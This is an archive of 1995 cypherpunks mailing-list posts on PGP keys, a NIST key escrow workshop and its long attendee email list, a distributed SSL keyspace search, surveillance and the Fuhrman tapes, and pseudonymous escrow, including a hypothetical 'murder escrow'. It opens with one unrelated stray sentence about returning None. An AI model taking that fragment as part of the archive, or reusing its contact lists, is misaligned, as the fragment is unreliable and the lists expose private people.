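Returning None when nothing is overdue is a choice made here to keep duplicated search low; a supervisor nearing the end of a pass could instead shorten the expected completion times it hands out.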






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Fri, 1 Sep 95 15:13:26 PDT
To: don@cs.byu.edu
Subject: Re: Web of Trust
In-Reply-To: <199509011201.GAA01376@wero>
Message-ID: <Pine.BSD.3.91.950901150726.26786A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Sep 1995 don@cs.byu.edu wrote:

> I am requesting that all "active" cypherpunks/cyphergroupies please send me
> their key number, IF it's already on the keyservers. If it's recently put
> there, be sure to tell me or I will be annoyed. If it's not there at all,
> I'll be annoyed. Personally annoyed, not I-ran-some-scriptfile annoyed. If
> you searched any of the RC4 or SSL keyspace, for example, I'm interested.
> If you post messages occasionally, [conspiracypunks need not apply] I'm
> interested. If you generated a key because your neighbor taught you how,
> don't bother. 


Hi,

Please feel free to add my key to your keychain and/or keyserver.

I am a cyberpunk in the most original sense.  From the early '80s the 
days of 8BBS & 414's, etc.   I am also in the book "CyberPunks" [now in 
your book store] see who signed my key, and you'll have a clue who I am.

Enjoy the key!


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: syrinx@c2.org (Syrinx Anonymous Remailer)
Date: Fri, 1 Sep 95 15:27:13 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <199509012222.PAA13146@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


'Tatu Ylonen' was reported to have written:
 
> I do find it rather shocking that the most powerful country in the
> world sets industrial espionage as the primary task of their
> intelligence services.

Well, I have a letter from a United States Senator which was
received last year in response to my phone call in opposition
to the Digital Telephone Act of 1994 (S. 2375). Here's the interesting
part:

"According to the director of the Federal Bureau of Investigations
(FBI), Louis Freeh, the number one law enforcement, public
safety, and national security issue facing us today is preserving
the ability to conduct court approved wiretaps."

In other words, retaining the ability to monitor citizen communications
is their greatest concern. This should be more than shocking to
anyone who cares about privacy.

It appears as though the primary function of the FBI and the
"intelligence services" are similarly directed. One significant
distinction is that the FBI's stated mission is directed toward
the "owners of the country" (to borrow a term from Perot).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 1 Sep 95 07:29:05 PDT
To: cypherpunks@toad.com
Subject: Re: FUHRMAN key escrow
In-Reply-To: <199509011002.FAA28046@mail.socketis.net>
Message-ID: <Pine.HPP.3.91.950901160707.14946B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


Gary Jeffers wrote:
>    Fuhrman seems to be a Godsend to us. He is helping to destroy the
> public's perceived legitimacy of state authority. If things keep moving
> the way they are, Fuhrman may join the names: John Crapper, Quisling,
> & Hooker. In which case, I propose the term, Fuhrman key escrow, to
> substitute for the term, mandatory state key escrow.

The issue is apparently also teaching the US public to use CODE:

'I don't give a f-wording s-word how many times this c-word-sucker
 said the n-word as long as the DNA-tests say that the other
 son-of-a-b-word did it.'

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 1 Sep 95 13:28:27 PDT
To: cypherpunks@toad.com
Subject: Key Escrow Workshop agenda & discussion paper 3
Message-ID: <59234.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



The following message segment:
 ------------------------------
From: Arlene Carlton <carlton@micf.nist.gov>
Fri, 01 Sep 1995 15:30:46 -0400
Cc: carlton@micf.nist.gov
Subject: Key Escrow Workshop agenda & discussion paper 3


                                          September 1, 1995

Dear Participant:

       Thank you for agreeing to participate in the two-day meeting
on software key escrow encryption.  We are anxious to work with
you and other industry representatives to facilitate development
of exportable key escrow encryption in software products.  I look
forward to the workshop being an important step in that process.
[snip]
 ---------------------------------
 Was sent to the following folks. I assume that this means that
these people are participants.  I see Dan W from CDT, Soble from EPIC
and Whitfield Diffie, on our side, plus assorted folks with stakes
such as tis.com and netscape.com
And of course, DERD for the other side.

Blank Unicorn had posted to c'punks that he was attending. Of course,
while I know what he looks like, I have no idea which nym is his.

Pat

List of attendees/registered participants follows:
 100436.3361@compuserve.com,
 73167.2027@compuserve.com,
 73534.3011@compuserve.com,
 75300.3232@compuserve.com,
 76225.2603@compuserve.com,
 ablee@mitre.org,
 ads012@email.corp.mot.com,
 ams@eit.com,
 amte09@email.corp.mot.com,
 asteen@novell.com,
 baum@world.std.com,
 bekutz@aol.com,
 bflowe@mcimail.com,
 bill.poulos@oga.eds.com,
 bill.poulos@oga.eds.com,
 branstad@tis.com,
 bsaclu@aol.com,
 c.baggett@cablelabs.com,
 carol.donovan@network.com,
 ccrafton@gi.com,
 charlesabzug@acm.org,
 ckc@rfpo1.rfc.comm.harris.com,
 cmo@cohnmarks.com,
 coallen@us.oracle.com,
 cpadilla@attmail.com,
 cpadilla@attmail.com,
 csmith@steptoe.com,
 davery@grci.com,
 david_rose@ccm.fm.intel.com,
 ddodson@nist.gov,
 denning@cs.cosc.georgetown.edu,
 deyoung@rpcp.mit.edu,
 dinsmore@tis.com,
 djw@cdt.org,
 dkozlay@ire.com,
 dmiller@spa.org,
 Don_Sortor-ads012@email.corp.mot.com,
 ebarker@nist.gov,
 ed@tecsec.com,
 emessmer@world.std.com,
 ezzy_dabbish-amte09@email.corp.mot.com,
 flahavin@csmes.ncsl.nist.gov
 french@zeke.enet.dec.com,
 gomes@dockmaster.ncsc.mil,
 gordon@ipower.nsc.com,
 hoffman@seas.gwu.edu,
 housley@spyrus.com,
 hoydyshd@mcln.unisysgsg.com,
 i.goldsmith@nexor.co.uk,
 infocker@megaweb.com,
 jackk@microsoft.com,
 jag@jgvandyke.com,
 jaltman@milchev.com,
 jamanni@missi.ncsc.mil,
 james.hughes@network.com,
 jdrandall@vnet.ibm.com,
 jean_m_baronas@co.xerox.com,
 jeff.rulifson@Eng.Sun.COM,
 jeff@netscape.com,
 jerry@ods.com,
 jgheiner@aol.com,
 jimmy@ipower.nsc.com,
 jimn@calv1.cray.com,
 jkrauss@cpcug.org,
 john@ipower.nsc.com,
 john_pascatore@ivision.com,
 jroberts@cmp.com,
 js@cup.hp.com,
 jseiger@cdt.org,
 jwinston@ota.gov,
 jya@pipeline.com,
 jya@pipeline.com,
 kandy@micf.nist.gov,
 karen.randall@att.com,
 kawamoto@mitre.org,
 kaye@ix.netcom.com,
 kent_landfield@sterling.com,
 khrose@annap.infi.net,
 klensin@mci.net,
 lc2m@andrew.cmu.edu,
 lcarnahan@nist.gov,
 lhg@nrc.gov,
 lovornj@usva8.dyncorp.com,
 lshomo@hqops.hq.nasa.gov,
 lthrash@hqamc.army.mil,
 lydia.bell@tip.navsea.navy.mil,
 maitgmu@aol.com,
 martin.ferris@treas.sprint.com,
 mary_smolenski@ita.doc.gov,
 mbohannon@banyan.doc.gov,
 mccord@nosc.mil,
 melanie.carter-maguire@nt.com,
 mendelson@tis.com,
 mfa@compaq.com,
 michael.palgon@sciatl.com,
 mignon@atc.boeing.com,
 mikus@viacrypt.com,
 mjl@liii.com,
 mpapillo@snap.org,
 mpapillo@snap.org,
 mppulkk@mikropc.fi,
 mrainey@itic.nw.dc.us,
 murray2@vnet.ibm.com,
 natstrat@dgs.dgsys.com,
 nazario@csmes.ncsl.nist.gov,
 paradise@wellsfargo.com,
 pfarrell@netcom.com,
 pjclark@ix.netcom.com,
 po7114@email.mot.com,
 polk@csmes.ncsl.nist.gov,
 powar@visa.com,
 randy@mci.net,
 ravenis@novell.wd.cubic.com,
 rjg9324@glaxo.com,
 rjoconnor@aol.com,
 rmedlock@mitre.org,
 roberth@bsa.org,
 rolfe.doc.gov@micf.nist.gov,
 rozzie@iris.com,
 rwessman@us.oracle.com,
 sbaker@steptoe.com,
 Schneck@mitre.org,
 Schneck@ncsl.nist.gov,
 sevans@csn.com,
 shabbir@panix.com,
 simona@sea.org,
 sking@mitre.org,
 sltm@msg.ti.com,
 snouffer@st1.ncsl.nist.gov,
 sobel@epic.org,
 squires@arpa.mil,
 stuart@bellcore.com,
 stw@atc.boeing.com,
 sullivan@interramp.com,
 tajalli@tis.com,
 tec.teclgl@micf.nist.gov,
 ted_gerbracht@ml.com,
 tfuhrman@ostp.eop.gov,
 thomas_clare@sterling.com,
 trivers@is.ge.com,
 trstsc@tevm2.nsc.com,
 ttobin@atl.ge.com,
 wafranklin@attmail.com,
 walker@tis.com,
 walt@osf.org,
 walters@snad.ncsl.nist.gov,
 wford@bnr.ca,
 whitehurst@vnet.ibm.com,
 whitfield.diffie@Eng.Sun.COM,
 whpayne@abq-ros.com,
 wmcglone@milchev.com,
 wright@dockmaster.ncsc.mil,

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 1 Sep 95 08:50:47 PDT
To: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Subject: Re: SSL search attack
In-Reply-To: <9509011325.AA20856@spirit.aud.alcatel.com>
Message-ID: <"swan.cl.cam.:275380:950901154847"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>>>> I see nothing wrong with the concept of being allocated an initial chunk
>>>> and having the scan software attempt to ACK it when 50% of it has been
>>>> searched. A successful ACK would allow the releasing of a new chunk (in
>> You NEVER claim to have searched space until you have actually done so. 
> That is exactly what I was arguing against - but the first sentence of what
> I quoted was saying was ok.

No -- If you ask for 2 segments, then when you are 50% done, it is OK to ACK 
the *FIRST* segment.

>> Assuming that you are multi-threaded--- Simply run two "workers" on the
>> same machine. If there are delays in getting keys assigned, the two will
>> soon get out of phase and keep the cpu busy.
> I kind of like that idea...

I thought of that, but:
1) for the same server load, it doubles the number of unACKed segments
2) if process A is lagging process B, then when process B finishes and is idle
   waiting for the server, process A will run faster and thus reduce the lag.
   This will make the processes drift into phase.
   I'm not convinced one way or the other.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 16:51:13 PDT
To: cypherpunks@toad.com
Subject: Surveillance a Growing Problem
Message-ID: <ac6cea0f00021004158f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've changed the thread name from "Fuhrman...." to the topic being
discussed here.)

At 10:56 PM 9/1/95, Buford Terrell wrote:

>If you've ever watched Not_at_all_Funny Home Videos or any of the
>American Urinal school of tabloid television, you soon start feeling
>that the real threat to privacy is not the guvmint, but all of
>the yoyos with their little cam corders running around pointing them
>at people.
>
>Security cameras in ATMS and at airline ticket counters do more
>to threaten your privacy than do FIBBIE wiretaps, and PGP won't
>protect you from them. (and usually neither will the courts).

I absolutely agree with this, though this doesn't mean I'll stop worrying
about the government's plans for key escrow (GAK), about limits on key
lengths, or about other efforts to thwart strong security.

But clearly the "technologies of surveillance," ranging from
massively-cross-correlated mailing lists to smaller and cheaper and more
ubiquitous video cameras, are very nearly an equal threat.

(Lots of issues, from the nearly universal requests for Social Security
Numbers, to the growing powers of courts to compel the disclosure of
private documents, to, well, you folks all know the trends.)

Folks like us should not be lobbying for limitations on what other private
individuals or companies are doing, but should concentrate first, on
technological alternatives (encryption, unlinkable credentials, digital
money, that sort of thing) and second, on educating others that security
and privacy is best self-arranged and is rarely accomplished by government
assuming the role of protector.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 1 Sep 95 14:01:12 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Fuhrman needed a digital pseudonym!
In-Reply-To: <ac6c95850302100486b3@[205.199.118.202]>
Message-ID: <9509012100.AA07333@wombat.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

I almost always agree with Tim.  This time I have to differ -- I think
his outrage at the course of the OJ trial has fogged his head.

> * This post is primarily about the role of pseudonyms, not the OJ trial or
> the testimony/tapes involving Mark Fuhrman.

Well, it's hard to see that from reading the rest of it.


> Before you folks jump on the "racist" Mark Fuhrman, think about the
> "surveillance state" issues. While it was not any government organization
> that taped Fuhrman's comments, there are some real issues involved in how
> deeply and how far back we want to "mine" comments made by people. Some
> real issues of privacy.

I don't see any "surveillance state" issue.  Fuhrman openly agreed to
speak to the screenwriter.  AFAIK, he had no reason to believe the
screenwriter wouldn't tell anyone else.  Nor should he have counted on
that anyway.  Any loss of credibility (or other penalty) he receives
is entirely deserved, IMO.

If he didn't want his words coming back to "haunt" him, he shouldn't
have spoken them, in this setting at least, whether they were sincere
or merely an attempt to puff himself up in her eyes.  Speaking as a
"consultant" (or whatever he imagined his relationship with the
screenwriter to be) isn't the same as speaking in confidence to your
best friend in a private setting anyway.


> Anyone in favor of heading off the "surveillance society" should be alarmed
> at this development. As tape recorders and video cameras proliferate,
> comments may be compiled, taken out of context, and used as evidence.

I am not alarmed in the least (by this development, anyway).  There's
no evidence that Fuhrman's comments are being taken out of context.
Fuhrman freely entered into the arrangement wherein his comments were
recorded.  Let's face it, the most likely explanation here is that
Fuhrman is a lying scumbag.

The fact that Fuhrman may be a lying scumbag doesn't make OJ any less
guilty.  However, it does throw a lot of suspicion on Fuhrman's
testimony.  OJ's entire defense has been based on the claim that
Fuhrman and other LAPD members lied and otherwise conspired in order
to frame him.  These tapes are clearly appropriate to that defense
whether you believe the defense a valid one or not.


> But have people given up the right to speak "for themselves" in private? If
> there is no solid evidence that Fuhrman actually committed any crimes, but
> only appeared to be puffing himself up, a la a Wambaugh wannabee, then why
> are his "racist" and "sexist" comments deemed so important as to have
> derailed the trial for the last couple of weeks?

The fact that Fuhrman's comments are racist or sexist is not the
point.  What is important is that he lied in court about having made
those statements.  If he or the prosecution believes that a case can
be made that Fuhrman was just puffing himself up, then they should try
to convince the jury of that.


> To be sure, there are valid trial issues:
> 
> -- Did he misspeak, misremember, or lie when he said he had "never" used
> the word "nigger" in the past 10 years?

Yes, IMO, this is the important issue.  Anyone who dispenses racial
epithets with the ease he apparently displayed in the tapes is an
idiot to have made such a claim whether the tapes were puffery or not.


> -- If this is perjury, how does it affect other evidence? (I'm not a
> lawyer, but I grok from the comments on CNN that this has to do with
> whether his testimony was supportive of other evidence, "cumulative," and
> related issues.)

IANAL, but let me just say that if I were on the jury, I don't think
I'd believe a single word he'd said during the trial.  I think that
I would probably still believe him to be guilty, anyway, but it's hard
to be sure without having heard only what the jury has heard.


> -- Does this possible misspeaking, misremembering, or lying have anything
> to do with whether he planted the bloody glove?

I don't know.  I'm kinda amazed that Ito has said that other portions
of his taped words won't be used, such as those parts where he describes
manufacturing evidence against the accused.  That seems to me to be
clearly relevant, at least as relevant as his use of the n-word.


> Anyway, I am greatly disturbed by this "mining" of ancient comments, made
> to a screenwriter.

Not me.  A few weeks ago there was a thread concerning the use of
information by private "reputation" bureaus.  I can't find the thread
in the archives but I seem to recall you defending the right of
private entities to keep and distribute such information (my apologies
if this was someone else).  Anyway, to me, these tapes fall clearly in
the same domain.  This screenwriter isn't a government agency, the
information was freely given, and the screenwriter has every right to
offer it for whatever purpose she deems appropriate, for free or
for money (barring any agreements to the contrary, of which I have
heard nothing).


-- Jeff



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 1 Sep 95 17:46:10 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <8B04409.00030003D4.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


TC> This is one thing that _bonding_ is designed to partially ameliorate. One
TC> posts a bond which is greater than the amount being carried, or at least is

  A variation of a bond is an escrow agent....

     Overload Alert: I use "escrow" here in the more mundane sense of
     the folks who collect your real estate taxes and homeowners'
     insurance from you 1/12th at a time along with your mortgage
     payment, for instance.

  If the buyer has a =nonymous= agent to receive the payment, which is
only released to the seller upon proof(s) of performance (whether in
lump sum or on a schedule of staged payments tied to specific milestones
in a long-term project) then the buyer has someone to go after in the
event of such shenanigans.

TC> There are still scams and maneuvers to thwart this reputation capital
TC> scheme. The agent planning to "defect" (default, split, abscond, renege,
TC> etc.) can try to pile up as many pending transactions as possible,
TC> anticipating that the various transactees will be unaware of each other.

  And the escrow method dynamically scales to meet this threat, whereas
the bond is static.

  Of course, the escrow agent will extract his pound of flesh, just as
any other form of insurance. Such is the nature of life.




 * A Liberal puts your money where his mouth is.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 1 Sep 95 14:14:53 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Different Keys for Signing and Encrypting
In-Reply-To: <199509011912.MAA29475@ix8.ix.netcom.com>
Message-ID: <9509012114.AA00959@m37-332-6.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> unfortunately, you can't predict their behavior, and if you change
> encryption keys more often than signature keys, they'll load the
> newest encryption key last.

Actually, the most recently-added key will be the one that is
used.. So updating your encryption key works fine, since the most
recent encryption key will be on top, and hence used first.

> For the problem that started this discussion, though, there's no good
> solution.  Since the Bad Guys _can_ encrypt a message to you with your
> signature key, and send it to you by anonymous remailer, they can
> plant a reason to suspect that you may have evidence encrypted with
> that key.

True.. To get around this problem you need the concept of a two-key
certificate... However a rogue user could still use the signature
key to encrypt, so I'm not sure that even this would help the problem.

-derek



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 17:07:53 PDT
To: <cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6cec3b010210049826@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:45 AM 9/2/95, David Murray wrote:

>I've often thought that in a system of digital pseudonyms, where no-one need
>trade with a negative reputation (a reputation deficit?), something like
>Akerlof's Market for Lemons will arise, and _all_ pseudonyms will be treated
>as (reputationally) worthless.

Doubtful, as we already have evidence that people are treating some digital
pseudonyms as reputationally valuable. Examples abound.

>[Akerlof, if I remember my economics right (and I am confident that I will
>be corrected if I don't) analysed a market for used cars. There were two
>types of cars: good ones, and lemons. A purchaser couldn't tell the difference
>until she had bought the car. Since the expected value of a used car was less
>than the value of a good car, purchasers wouldn't pay the good car price.
>But that would mean owners of good cars wouldn't offer them for sale (in
>this market). So the only cars for sale would be lemons :-)]

I haven't encountered this example, but it clearly misses some important
real-world issues. First, people buying used cars are strongly advised to
take the car to an independent mechanic to be checked out (a kind of
variant of the "cut-and-choose" protocol at work). This often reveals
lemons. Second, people take test drives, look under the hood, kick the
tires, etc. This also often reveals lemons. Third, the reputation of the
used car dealer is, despite nearly a century of jokes to the contrary,
often very important.

The last two cars I've bought I bought used--albeit with low mileage on
each--from car dealers. I took test drives and got a limited warranty in
each case. The first car I drove for 12 years with essentially no problems,
the second I've been driving for almost 3 years.

Like a lot of simple game-theoretic models, the application to the real
world is quite different.

But I certainly agree that crypto will reignite interest in analyses of
such game theory questions. Another way of viewing anonymity vs.
non-anonymity is that knowing the True Name of a party with whom one trades
is just _one element_ of a transaction. By no means is it essential.

(Think of various trading situations where one has no idea of the True Name
of the other parties: cash-and-carry transactions, flea markets, many
international trade arrangements, etc. As we have discussed in past
discussions of anarchy, the international trading regime is essentially an
anarchy, in that no Higher Authority exists to resolve disputes in a
top-down way...the so-called "Law Merchant" evolved to resolve disputes in
such trading situations.)


>As Tim points out, this is a non-crypto problem as well, and devices such as
>bonds or (which are game-theoretically similar) expensive advertising or
>plush premises [if they spent an unrefundable $20million on the Rolling
>Stones, they're not likely to throw it all away by ripping you off for
>$100 ;-)] are used to convince potential customers of one's bona fides.
>
>How these transfer to the world of cyber-finance, I'm not sure, but I suspect
>it leaves a role for True Names in the management of credit risk: as escrow
>agents, middlemen, clearing houses etc. [Although, having said that, if the
>Akerlof analysis applies, you just *can't* grant (unsecured) credit to
>pseudonyms - the percentage of defaulters will be 100...] But these Names are
>True only in the sense that they are juridically persistent (that is, if
>they transact today, they can be sued tomorrow), and need not be traceable
>to any True People (Warm Bodies?) - anonymously held corporations, for
>example.
>
>If you can't rely on the unsecured promise of a digital pseudonym, and you
>can't accept reputation as 'security', how do you extend credit?

I am willing to extend some amount of credit to PrOduct Cypher, Black
Unicorn, etc., based on their past reputation and on the fact that I can
show to others the transactions into which their pseudonyms entered and
thus expose them if they default. Now _how much_ I'm willing to extend is
of course a more complicated issue, but the principle is still there: a
purely digital pseudonym, with no possibility of being tied to a True Name,
can still be extended credit....I just said I would do so.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Fri, 1 Sep 95 15:09:28 PDT
To: cypherpunks@toad.com
Subject: Fuhrman needed a digital pseudonym!
Message-ID: <199509012218.RAA23055@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>From: tcmay@got.net (Timothy C. May)
>Subject: Fuhrman needed a digital pseudonym!

>Before you folks jump on the "racist" Mark Fuhrman, think about the
>"surveillance state" issues. While it was not any government organization
>that taped Fuhrman's comments, there are some real issues involved in how
>deeply and how far back we want to "mine" comments made by people. Some
>real issues of privacy.
>
>The Mark Fuhrmans of the future may be interested in using technologies to
>protect their privacy, to give them "plausible deniability" should their
>recorded words come back to haunt them.
>
...
>* And the issue of "mining" of ancient records, especially as technology
>makes the recording of sounds, the taping of sights, and the archiving of
>electronic messages so much easier.
>
...
>What really bothers me, as it relates to the pro-privacy themes of this
>list, is the reaching back many years to comments made by a witness--Mark
>Fuhrman--to a screenplay writer. Because she kept audiotapes, going back 10
>years, these comments may likely strongly influence the verdict in this
>"trial of the century."
>
>Anyone in favor of heading off the "surveillance society" should be alarmed
>at this development. As tape recorders and video cameras proliferate,
>comments may be compiled, taken out of context, and used as evidence.
...
>
>--Tim May
>
If you've ever watched Not_at_all_Funny Home Videos or any of the
American Urinal school of tabloid television, you soon start feeling
that the real threat to privacy is not the guvmint, but all of
the yoyos with their little cam corders running around pointing them
at people.

Security cameras in ATMS and at airline ticket counters do more
to threaten your privacy than do FIBBIE wiretaps, and PGP won't
protect you from them. (and usually neither will the courts).

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 1 Sep 95 17:19:06 PDT
To: cypherpunks@toad.com
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
Message-ID: <jw5RwkkAs2nN084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 01 Sep 1995, Michael Froomkin <mfroomki@umiami.ir.miami.edu> wrote:

> I think he would have to be charged first.  Have I missed something?
> PS when does the statute of limitations run out?

June '96.  Zimmermann and Dubois appeared on a local talk radio show
recently; a friend happened to catch the program, taped it, and played
excerpts at a Cypherpunks meeting.  This date was mentioned by Phil Dubois.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 18:13:57 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: A problem with anonymity
Message-ID: <ac6cfcfb0202100487ba@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:12 PM 9/1/95, MONTY HARDER wrote:
>TC> This is one thing that _bonding_ is designed to partially ameliorate. One
>TC> posts a bond which is greater than the amount being carried, or at least is
>
>  A variation of a bond is an escrow agent....
>
>     Overload Alert: I use "escrow" here in the more mundane sense of
>     the folks who collect your real estate taxes and homeowners'
>     insurance from you 1/12th at a time along with your mortgage
>     payment, for instance.
>
>  If the buyer has a =nonymous= agent to receive the payment, which is
>only released to the seller upon proof(s) of performance (whether in
>lump sum or on a schedule of staged payments tied to specific milestones
>in a long-term project) then the buyer has someone to go after in the
>event of such shenanigans.

Oh, I agree, of course. Except that the escrow agent need not be a
"nonymous" agent, to use Monty's terminology here.

The third party escrow agent can of course be a digital pseudonym.

(As I keep saying, having the True Name--whatever that means these days--is
only one facet, one factor of the overall equation. In some cases, very
important, in other cases, less important.)

The canonical--if morbid--example is the "Al's Murder Escrow" agent. Al
holds the digital money (deposited anonymously, etc.) and doesn't pay the
hitter until certain conditions are met.

(Chaum has schemes to partly deal with this, but "money mixes" eliminate
traceability, but may introduce other issues.)

There are of course issues involving the escrow agent deciding not to pay,
etc. But most escrow services, like banks, make more money by staying in
business than by defrauding customers.

(I mention banks because, when you look at it closely, today's banks can
quite easily claim that a customer made a withdrawal when he didn't. That
they don't says more about the nature of persistent businesses than about
any government oversight or security features. This is a side point, but it
bears keeping in mind that the real world of banks and businesses, etc., is
not fully secure, either. And yet it mostly works pretty well. The reasons
for this are interesting to consider.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 1 Sep 95 15:34:33 PDT
To: Deranged Mutant <rrothenb@ic.sunysb.edu>
Subject: Re: Phil Zimmermann/Amnesty International?
In-Reply-To: <199509011410.KAA20234@libws1.ic.sunysb.edu>
Message-ID: <Pine.PMDF.3.91.950901183258.541098183C-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think he would have to be charged first.  Have I missed something?
PS when does the statute of limitations run out?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot there.  And humid.  
Coral Gables, FL 33124 USA |                  But I'm elsewhere....
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Sep 95 18:51:13 PDT
To: cypherpunks@toad.com
Subject: Macintosh Users: "SpeedDoubler"
Message-ID: <ac6d03dc0302100425a6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



For you Macintosh users, I thought I'd share with you my experiences with
SpeedDoubler, a new utility that (effectively) doubles or even triples
performance of many applications that still are heavily dependent on 68K
code (as opposed to purely PowerPC code).

My PowerMac 7100av is currently running at 80 MHz, with a 512K L2 cache,
and 40 MB of physical RAM. (I can remember when 32K of "core" was a huge
amount, and I can remember when Intel supplied 8 MB to CDC for their
"Plato" system...at that time, one of the largest solid state memory
installations ever.)

SpeedDoubler, from Connectix, is a $60-70 (street) product that takes 68K
code and makes various optimizations for the PPC. It's effectively the 68K
emulator that Apple should have provided.

(For you non-Mac users who are reading this, this technology of
intercepting and translating code, is likely to be used to get higher
performance out of code written ostensibly for one CPU but actually run on
a later iteration of the processor. Such as the Pentium or P6 in running
16-bit code.)

In Speedometer, I saw a 3.9x increase in "CPU"-related tasks (for 68K
code), and a 2.4x increase in a SmalltalkAgents application which is only
available at this time in 68K code form.

Even the Finder runs faster, as various parts of it are still written in
68K code.

So, as many programs are still in 68K code form, and not yet rewritten for
the PPC, SpeedDoubler effectively gives you a machine that is almost twice
as fast.

There may be a few incompatibilities, and I would suggest you read
comp.sys.mac.apps and other groups to verify that your critical apps are
not having any problems.

All I can say is that I'm very happy.

--Tim May



---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
